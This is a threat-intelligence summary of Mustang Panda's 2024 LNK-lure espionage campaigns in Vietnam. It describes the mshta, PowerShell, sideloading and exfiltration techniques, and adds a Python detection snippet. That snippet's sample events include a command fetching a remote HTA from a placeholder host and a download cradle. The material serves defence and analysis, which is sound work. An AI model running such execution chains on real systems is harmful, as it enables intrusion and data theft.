2024-06-20

Mustang Panda's LNK File Lures in A New Wave of Tax Compliance Scams

Level: Tactical | Source: Cyble
Education
Financial
Government
Non-government organizations (NGOs)
Non-profit Organizations
Religion

Cyble Research and Intelligence Labs has unveiled a series of cyber espionage campaigns, active in April and May 2024, linked to the Chinese threat group Mustang Panda (aka BRONZE PRESIDENT, Earth Preta, RedDelta, Stately Taurus, TA416, UAC-0084). The group's activities particularly targeted organizations in Vietnam’s education and financial tax compliance sectors. These campaigns were first identified in April 2024, with subsequent actions traced through May 2024. During these periods, researchers observed two campaigns affecting the Vietnamese region, both initiated by distributing phishing emails containing archive files. These archives included LNK files with double file extensions to masquerade as legitimate documents. "Based on the network infrastructure used in the May 2024 campaign, we identified another campaign from April 2024, which used lures to target entities interested in the education sector," shared Cyble researchers.

In the May 2024 campaign, Mustang Panda employed a malicious LNK file disguised as a PDF through the double file extension technique. When executed, the LNK file leverages the forfiles utility to check for the presence of files within the “C:\Windows\Vss” directory before using PowerShell and the mshta application to execute a remotely hosted HTA file. "This HTA file includes an obfuscated string element that the VBScript deobfuscates and executes using wscript. The deobfuscation process involves manipulating characters by taking their ASCII values, XORing them with 1, and converting them back to the original characters," as examined by Cyble. The analysis of the VBScript reveals that the wscript process calls PowerShell to execute a remote PowerShell script using the Invoke-Expression cmdlet. These scripts download additional EXE and DLL payloads to enable DLL sideloading and establish persistence through registry modifications, adding themselves to the Run key.
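One way to express the May 2024 execution chain above as detection logic over process-creation events, as an added example that is not from Cyble's report or this summary. The rule names, the extension list and the sample events (including the placeholder URL) are constructed assumptions.

```python
import ntpath
import re

# A document-style extension followed by .lnk, e.g. "invoice.pdf.lnk" (assumed list).
DOUBLE_EXT_LNK = re.compile(r"\.(pdf|docx?|xlsx?|pptx?|txt|jpe?g|png)\.lnk$", re.I)

def is_double_ext_lnk(filename):
    """True when an archive member is a shortcut posing as a document."""
    return DOUBLE_EXT_LNK.search(filename) is not None

# One predicate per link of the process chain described in the paragraph above.
RULES = {
    "forfiles_spawns_interpreter": lambda e: e["parent"] == "forfiles.exe"
        and e["image"] in {"powershell.exe", "mshta.exe", "cmd.exe"},
    "mshta_remote_hta": lambda e: e["image"] == "mshta.exe"
        and re.search(r"https?://", e["cmd"], re.I) is not None,
    "wscript_powershell_iex": lambda e: e["parent"] == "wscript.exe"
        and e["image"] == "powershell.exe"
        and re.search(r"\b(invoke-expression|iex)\b", e["cmd"], re.I) is not None,
}

def match_rules(event):
    """Return the sorted names of the rules one process-creation event triggers."""
    e = {"parent": ntpath.basename(event["parent"]).lower(),
         "image": ntpath.basename(event["image"]).lower(),
         "cmd": event["cmd"]}
    return sorted(name for name, rule in RULES.items() if rule(e))

def scan(events):
    """Return (index, rule names) for every event that triggers at least one rule."""
    hits = [(i, match_rules(ev)) for i, ev in enumerate(events)]
    return [(i, names) for i, names in hits if names]

# Constructed sample events; command lines and the URL are placeholders.
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\forfiles.exe",
     "cmd": r'forfiles.exe /p C:\Windows\Vss /c "powershell ..."'},
    {"parent": r"C:\Windows\System32\forfiles.exe", "image": "powershell.exe",
     "cmd": "powershell mshta http://example.invalid/lure.hta"},
    {"parent": "powershell.exe", "image": r"C:\Windows\System32\mshta.exe",
     "cmd": "mshta http://example.invalid/lure.hta"},
    {"parent": "wscript.exe", "image": "powershell.exe",
     "cmd": "powershell -c Invoke-Expression (placeholder download cradle)"},
    {"parent": "explorer.exe", "image": "powershell.exe", "cmd": "powershell Get-ChildItem"},
]

if __name__ == "__main__":
    for index, names in scan(SAMPLE_EVENTS):
        print(index, names)
```

Each rule keys on a parent/child relationship rather than on a file hash or domain, so it still applies when the hosted payloads or infrastructure change.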

A similar pattern was observed in the April 2024 campaign, where the initial infection vector was also a double-extension LNK file. This campaign took a different approach, downloading a Word document alongside the execution of a PowerShell script, which subsequently retrieved additional malicious PowerShell and batch scripts. The batch script was copied into the startup folder and downloaded additional PowerShell scripts. One of these gathered system information (systeminfo), network information (netstat and netview), account and domain information (whoami, net group “domain admins” /domain), Desktop contents with Get-ChildItem, and context on security products with Get-WmiObject. The output of these reconnaissance commands was exfiltrated via a POST request to the attacker's control infrastructure. Another PowerShell script downloads an executable and two DLL payloads, which are executed with rundll32 for sideloading; the executable file is identified as a "legitimate executable renamed from 'WinWord.exe'."

The command-and-control (C2) infrastructure used by Mustang Panda across these campaigns was consistent, indicating a well-established network designed to stage exfiltrated data and execute remote commands. The techniques demonstrated in Mustang Panda's latest campaigns, as detailed by Cyble, provide insight into the tactics, techniques, and procedures (TTPs) the threat actor favors for its state-affiliated cyber espionage attacks. Understanding the group's strategic use of social engineering, combined with technical tactics, is vital not only for organizations in scope of the active campaign but also for tracking Mustang Panda's activities. Historically, Mustang Panda has targeted organizations associated with defense, government, non-government organizations (NGOs), nonprofits, and religious organizations.
